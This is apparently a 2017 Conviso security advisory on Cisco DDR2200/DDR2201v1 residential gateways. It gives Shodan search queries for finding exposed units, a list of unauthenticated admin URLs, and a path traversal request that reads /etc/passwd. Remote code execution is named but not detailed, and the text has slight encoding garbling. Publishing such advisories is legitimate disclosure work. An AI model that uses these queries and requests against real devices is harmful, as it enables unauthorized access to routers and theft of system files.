Professional Documents
Culture Documents
The information in this advisory is Copyright 2017 Conviso and provided so that the
society can understand the risk they may be facing by running affected software,
hardware or other components used on their systems. In case you wish to copy
information from this advisory, you must either copy all of it or refer to this
document (including our URL). No guarantee is provided for the accuracy of this
information, or damage you may cause your systems in testing.
*About Conviso*
This advisory has been discovered as part of a general investigation into the
security of software used in the IT environments of our customers. For more
information about our company and services provided, please check our website at
www.conviso.com.br.
*Security Advisory*
The page used to download the configuration file is vulnerable to path traversal,
that allows an attacker to download any system file.
*Issue Description*
Some of Cisco DDR2200 router series, show some vulnerabilities as, authentication
bypass, Remote code execution and path traversal
*Shodan Dork*
http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway"
http.title:"Cisco DDR2200 ADSL2+ Residential Gateway"
*Affected Components*
*Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway
*Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3
Path TraversalA A A
Bypass Authentication
Remote code execution (RCE)
*Vulnerabilities details*
Bypass Authentication
Some pages donat need the user to be authenticated to gain access
http://192.168.0.1:8080/info.html
http://192.168.0.1:8080/wancfg.cmd?action=view
http://192.168.0.1:8080/rtroutecfg.cmd?action=view
http://192.168.0.1:8080/arpview.cmd
http://192.168.0.1:8080/cpuview.cmd
http://192.168.0.1:8080/memoryview.cmd
http://192.168.0.1:8080/statswan.cmd
http://192.168.0.1:8080/statsatm.cmd
http://192.168.0.1:8080/scsrvcntr.cmd?action=view
http://192.168.0.1:8080/scacccntr.cmd?action=view
http://192.168.0.1:8080/logview.cmd
http://192.168.0.1:8080/voicesipview.cmd
http://192.168.0.1:8080/voicesipview.cmd?view=advanced
http://192.168.0.1:8080/usbview.cmd
http://192.168.0.1:8080/wlmacflt.cmd?action=view
http://192.168.0.1:8080/wlwds.cmd
http://192.168.0.1:8080/wlstationlist.cmd
http://192.168.0.1:8080/HPNAShow.cmd
http://192.168.0.1:8080/HPNAView.cmd
http://192.168.0.1:8080/qoscls.cmd?action=view
http://192.168.0.1:8080/qosqueue.cmd?action=view
http://192.168.0.1:8080/portmap.cmd
http://192.168.0.1:8080/scmacflt.cmd?action=view
http://192.168.0.1:8080/scinflt.cmd?action=view
http://192.168.0.1:8080/scoutflt.cmd?action=view
http://192.168.0.1:8080/certlocal.cmd?action=view
http://192.168.0.1:8080/certca.cmd?action=view
http://192.168.0.1:8080/waitPingqry.cgi
http://192.168.0.1:8080/PingMsg.cmd
*Path Traversal*
The page used to download the configuration file, is vulnerable to path traversal,
that allow an attacker to download any system file.
http://192.168.0.1:8080/download.conf?filename=/etc/passwd